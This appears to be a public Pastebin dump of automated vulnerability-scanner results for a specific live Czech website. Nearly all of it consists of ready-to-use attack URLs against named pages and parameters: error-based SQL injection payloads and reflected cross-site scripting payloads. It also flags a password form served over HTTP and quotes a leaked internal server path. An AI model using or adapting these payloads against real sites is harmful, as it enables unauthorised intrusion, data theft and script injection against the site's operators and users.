Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SQL Injection
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- http://www.czechnationalteam.cz/search.php?rstext=all-phpRS-all&rstema=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- http://www.czechnationalteam.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
- |||
- [High Possibility] SQL Injection
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- http://www.czechnationalteam.cz/search.php?rstext=all-phpRS-all&rstema=%27
- http://www.czechnationalteam.cz/?strana=%27
- http://www.czechnationalteam.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=%27
- http://www.czechnationalteam.cz/search.php?rskolik=%27&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
- http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=%27&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
- http://www.czechnationalteam.cz/index.php?strana=%27
- http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
- http://www.czechnationalteam.cz/search.php
- Parameter Name: rskde
- Parameter Type: Post
- Attack Pattern: (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
- http://www.czechnationalteam.cz/search.php
- Parameter Name: rstema
- Parameter Type: Post
- Attack Pattern: %27
- |||
- Cross-site Scripting
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- http://www.czechnationalteam.cz/search.php?rstext=all-phpRS-all&rstema='"--></style></script><script>alert(0x0001A9)</script>
- http://www.czechnationalteam.cz/view.php?cisloclanku='"--></style></script><script>alert(0x0001F0)</script>
- http://www.czechnationalteam.cz/view.php?nazevclanku=predstavujeme-distribuovane-vypocty-dc&cisloclanku='"--></style></script><script>alert(0x0001FC)</script>
- http://www.czechnationalteam.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema='"--></style></script><script>alert(0x00022C)</script>
- http://www.czechnationalteam.cz/rservice.php?akce=info&cisloclanku='"--></style></script><script>alert(0x000292)</script>
- http://www.czechnationalteam.cz/search.php
- Parameter Name: rstext
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0002BE)</script>
- http://www.czechnationalteam.cz/rservice.php?akce=info&cisloclanku='"--></style></script><script>alert(0x000292)</script>
- Vulnerable URL : http://www.czechnationalteam.cz/search.php
- Parameter Name: rstext
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0002BE)</script>
- http://www.czechnationalteam.cz/download.php?sekce=6'"--></style></script><script>alert(0x0002C5)</script>
- http://www.czechnationalteam.cz/download.php?akce=detail&id_detail=80&sekce='"--></style></script><script>alert(0x0002ED)</script>
- http://www.czechnationalteam.cz/view.php
- Parameter Name: cisloclanku
- Parameter Type: Post
- Attack Pattern: <script>ns(0x00032C)</script>
- http://www.czechnationalteam.cz/search.php
- Parameter Name: rsrazeni
- Parameter Type: Post
- Attack Pattern: "><script>alert(9)</script>
- http://www.czechnationalteam.cz/search.php
- Parameter Name: rstema
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00033C)</script>
- http://www.czechnationalteam.cz/rservice.php
- Parameter Name: cisloclanku
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00034E)</script>
- http://www.czechnationalteam.cz/search.php?rskolik='"--></style></script><script>alert(0x000355)</script>&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
- Parameter Name: rskolik
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000355)</script>
- http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext='"--></style></script><script>alert(0x00037B)</script>&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
- http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema='"--></style></script><script>alert(0x00039E)</script>&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
- http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde='"--></style></script><script>alert(0x0003A1)</script>&rsvelikost=sab&rsrazeni=datum_90
- http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab'"--></style></script><script>alert(0x0003B4)</script>&rsrazeni=datum_90
- http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab&rsrazeni='"--></style></script><script>alert(0x0003B5)</script>
- http://www.czechnationalteam.cz/readers.php
- Parameter Name: rjmeno
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0003F8)</script>
- |||
- Password Transmitted Over HTTP
- Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
- Vulnerable URL : http://www.czechnationalteam.cz/readers.php?akce=new
- Form target action: readers.php
- |||
- [Possible] Internal Path Leakage (*nix)
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- http://www.czechnationalteam.cz/?strana=%27
- Identified Internal Path(s): /var/www/web5/czechnationalteam.cz/czechnationalteam.cz/db/phprs_sql_to_mysql.php
- Parameter Name: strana
- Parameter Type: Querystring
- Attack Pattern: %27
- http://www.czechnationalteam.cz/search.php?rskolik=%27&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
- Identified Internal Path(s): /var/www/web5/czechnationalteam.cz/czechnationalteam.cz/db/phprs_sql_to_mysql.php
- Parameter Name: rskolik
- Parameter Type: Querystring
- Attack Pattern: %27
- http://www.czechnationalteam.cz/index.php?strana=%27
- Identified Internal Path(s): /var/www/web5/czechnationalteam.cz/czechnationalteam.cz/db/phprs_sql_to_mysql.php
- Parameter Name: strana
- Parameter Type: Querystring
- Attack Pattern: %27
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement